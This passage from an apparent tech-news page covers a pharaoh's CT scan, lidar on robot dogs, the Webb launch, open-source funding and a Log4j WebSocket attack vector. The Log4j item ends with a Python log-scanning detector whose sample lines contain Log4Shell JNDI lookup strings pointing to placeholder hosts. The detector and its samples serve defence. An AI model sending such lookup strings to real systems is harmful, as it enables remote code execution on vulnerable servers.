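    'Event 1106: Error Code: 0x80004005. Error Description: Can\'t convert "2112290001" to long.',
    "Event 9000: MSExchangeTransport service started.",
]
```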

News

Egyptian Pharaoh's Mummified Body Gives Up Its Secrets After 3,500 Years (theguardian.com) 12

With his narrow chin, small nose and curly hair he physically resembles his father, said radiologist Sahar Saleem. Perhaps surprisingly for someone who lived about 3,500 years ago, he also has strikingly good teeth. From a report: Saleem is talking about the mummified body of the pharaoh Amenhotep I, a warrior king who has been something of an enigma in that he is one of the few royal mummies not to be unwrapped in modern times. Until now, that is. Saleem, a professor of radiology at the faculty of medicine at Cairo University, is part of a team which has successfully unwrapped Amenhotep I not physically but digitally. The results, using 3D computed tomography (CT) scanning technology, are unprecedented and fascinating. They provide details about his appearance and the lavishness of the jewellery he was buried with. "We show that Amenhotep I was approximately 35 years old when he died," Saleem said. "He was approximately 169cm tall [5ft 6in], circumcised, and had good teeth. Within his wrappings, he wore 30 amulets and a unique golden girdle with gold beads. "Amenhotep I seems to have physically resembled his father ... he had a narrow chin, a small narrow nose, curly hair, and mildly protruding upper teeth."

The Military

Why the Air Force Wants To Put Lidar On Robot Dogs (popsci.com) 18

An anonymous reader quotes a report from Popular Science: "Imagine being able to see the components of a potentially dangerous situation in live 3D and in fine detail without even having to survey the area," says Brian Goddin, from the Air Force Installation and Mission Support Center public affairs, in a video produced by the military. [...] Putting lidar on drones and on ground robots gives the military a way to map the interior of a building with a machine. With that lidar data transmitted to the computers in a command center, or even just the tablet of an operator sitting outside the building, a human can see what the robot sees, and direct the robot accordingly. (In the civilian world, lidar sensors are commonly used on self-driving cars as one tool for the vehicles to perceive the world around them.) Goddin's presentation, released online December 9, 2021, shows lidar mounted on Spot, the Boston Dynamics dog-shaped robot. Ghost Robotics Q-UGV machines, also dog-shaped and sensor-rich, have been used to patrol the perimeter of Tyndall AFB, making Spot the second breed (or brand) of robot dog to serve the needs of the base.

While all of this mapping at Tyndall is happening in the wake of Hurricane Michael, creating a virtual 3D model of the buildings as they stand can guide future repair. Such a virtual model is a useful tool for regular maintenance and repair, and it provides a record of a prior state should disaster strike again. Such techniques could also allow better investigations of failure after the fact. By comparing lidar scans of downed or wrecked craft to those before launch, and to surviving aircraft that made it back from a fight, the Air Force could understand how to better make more durable craft. Scanning a wrecked plane with lidar also lets rescue workers and recovery teams know if and how they should act to save pilots and passengers, suggested Javier Rodriguez, a technician stationed at Tyndall.

NASA

'A Christmas Gift for Humanity' - Cheers Erupt After Webb Telescope Completes Flawless Launch (www.cbc.ca) 56

"We have LIFTOFF of the @NASAWebb Space Telescope!" NASA tweeted seven hours ago, sharing a 32-second video of the launch. "At 7:20am ET (12:20 UTC), the beginning of a new, exciting decade of science climbed to the sky," they wrote, adding that the telescope "will change our understanding of space as we know it."

The CBC reports: The world's largest and most powerful space telescope rocketed away Saturday on a high-stakes quest to behold light from the first stars and galaxies, and scour the universe for hints of life.

NASA's James Webb Space Telescope soared from French Guiana on South America's northeastern coast, riding a European Ariane rocket into the Christmas morning sky. "What an amazing Christmas present," said Thomas Zurbuchen, NASA's science mission chief.

The $10-billion US observatory hurtled toward its destination 1.6 million kilometres away, or more than four times beyond the moon. It will take a month to get there and another five months before its infrared eyes are ready to start scanning the cosmos. First, the telescope's enormous mirror and sunshield need to unfurl; they were folded origami-style to fit into the rocket's nose cone. Otherwise, the observatory won't be able to peer back in time 13.7 billion years as anticipated, within a mere 100 million years of the universe-forming Big Bang. NASA administrator Bill Nelson called the telescope a time machine that will provide "a better understanding of our universe and our place in it: who we are, what we are, the search that's eternal."

"We are going to discover incredible things that we never imagined," Nelson said following liftoff, speaking from Florida's Kennedy Space Center. But he cautioned: "There are still innumerable things that have to work and they have to work perfectly.... We know that in great reward there is great risk...."

"We have delivered a Christmas gift today for humanity," said Josef Aschbacher, the European Space Agency's director general....

Cheers and applause erupted in and outside Launch Control following the telescope's flawless launch...

Official online dashboards are now tracking its position. (And you can watch complete footage of the entire launch here.) "If all goes well, the sunshield will be opened three days after liftoff, taking at least five days to unfold and lock into place," the CBC points out. "Next, the mirror segments should open up like the leaves of a drop-leaf table, 12 days or so into the flight." In all, hundreds of release mechanisms need to work — perfectly — in order for the telescope to succeed. Such a complex series of actions is unprecedented — "like nothing we've done before," noted NASA program director Greg Robinson.

Thanks to Slashdot readers Dave Knott and hackertourist for sharing the news...

Open Source

Will It Take More Than Open Source Funding To Prevent the Next Log4j? (openssf.org) 110

"While the lack of funding in open source is certainly a problem, could funding have prevented the Log4j vulnerabilities?" asks Mike Melanson's "This Week in Programming" column. "Would funding actually prevent similar vulnerabilities in the future...?"

Or is that an oversimplification? In a blog post for the Linux Foundation's Open Source Security Foundation (OpenSSF), Brian Behlendorf argued that open source foundations must work together to prevent the next Log4Shell scramble, outlining seven points that OSS foundations could do to mitigate security risks. Among those seven points — which include security scanning, outside audits, dependency tracking, test frameworks, organization-wide security teams, and requiring projects to remove old, vulnerable code — not once was funding mentioned. Rather, Behlendorf precedes these points by saying that "Too many organizations have failed to apply raised funds or set process standards to improve their security practices, and have unwisely tilted in favor of quantity over quality of code."

Behlendorf continues after his list of seven suggested acts with a section that boils everything down perfectly:

"None of the above practices is about paying developers more, or channeling funds directly from users of software to developers. Don't get me wrong, open source developers and the people who support them should be paid more and appreciated more in general. However, it would be an insult to most maintainers to suggest that if you'd just slipped more money into their pockets they would have written more secure code. At the same time, it's fair to say a tragedy-of-the-commons hits when every downstream user assumes that these practices are in place, being done and paid for by someone else."

Behlendorf does go on to make some points about funds and fundraising, but his point is less on the lack of funding than the allocation of those funds and how they need to be focused on things like paid audits and "providing resources to move critical projects or segments of code to memory-safe languages, or fund bounties for more tests."

Behlendorf says that, in the new year, the OpenSSF will be working to "raise the floor" for security in open source.

"The only way we do this effectively is to develop tools, guidance, and standards that make adoption by the open source community encouraged and practical rather than burdensome or bureaucratic," he wrote. "We will be working with and making grants to other open source projects and foundations to help them improve their security game."

Behlendorf was a founding member of the Apache Group, which later became the Apache Software Foundation.

So as a long-time member of the Open Source community, he calls the Log4j vulnerabilities "a humbling reminder of just how far we still have to go."

Java

Security Firm Blumira Discovers Major New Log4j Attack Vector (zdnet.com) 91

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that, by using one of the many Java Naming and Directory Interface (JNDI) exploits, they could trigger the vulnerability via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI), default port 1099, although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, once an open port to a local service or a service accessible to the host is found, it can drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants.

Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports."
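The chain this report describes (a JNDI lookup string dropped into a request path or parameter, with the host then calling out over RMI on 1099, LDAP on 389/636 or DNS on 53, sometimes on custom ports) turned into a detector a defender can run over web-server access logs. This is an added example, not Blumira's or ZDNet's code; the log lines and addresses are constructed, and the per-scheme default ports are assumed from the standard service ports.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Ports the report says to restrict at egress, keyed by the JNDI scheme that uses them by
# default (assumed standard defaults: RMI registry 1099, LDAP 389, LDAPS 636, DNS 53).
DEFAULT_PORTS = {"rmi": 1099, "ldap": 389, "ldaps": 636, "dns": 53}
WATCHED_PORTS = frozenset(DEFAULT_PORTS.values())

# A plain JNDI lookup as it appears in a request path, query parameter or header value.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:/*(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def find_jndi_lookups(text: str) -> List[Dict[str, object]]:
    """One record per lookup string in text; percent-encoding is decoded first so
    strings hidden in URL-encoded paths are still seen."""
    found = []
    for m in JNDI_RE.finditer(unquote(text)):
        scheme = m.group("scheme").lower()
        port = int(m.group("port")) if m.group("port") else DEFAULT_PORTS.get(scheme)
        found.append({
            "scheme": scheme,
            "host": m.group("host"),
            "port": port,
            # False means the callback uses a custom port that the four-port egress rule misses.
            "watched_port": port in WATCHED_PORTS,
        })
    return found


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run the detector over access-log lines, tagging each hit with its line number."""
    hits = []
    for number, line in enumerate(lines, 1):
        for record in find_jndi_lookups(line):
            hits.append(dict(record, line=number))
    return hits


# Constructed access-log lines using documentation-range addresses; not real traffic.
SAMPLE_LOG = [
    '10.0.0.7 - - [13/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [13/Dec/2021:10:00:02 +0000] "GET /api/items?q=${jndi:rmi://192.0.2.10:1099/obj} HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [13/Dec/2021:10:00:03 +0000] "GET /%24%7Bjndi%3Aldap%3A//192.0.2.10%3A1389/a%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [13/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:dns://203.0.113.5/x}"',
]
```

The third sample line shows why the report's port-based egress rule is only a partial control: a callback on a custom port (here 1389) is flagged by the content match but would not be caught by filtering 53, 389, 636 and 1099 alone.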
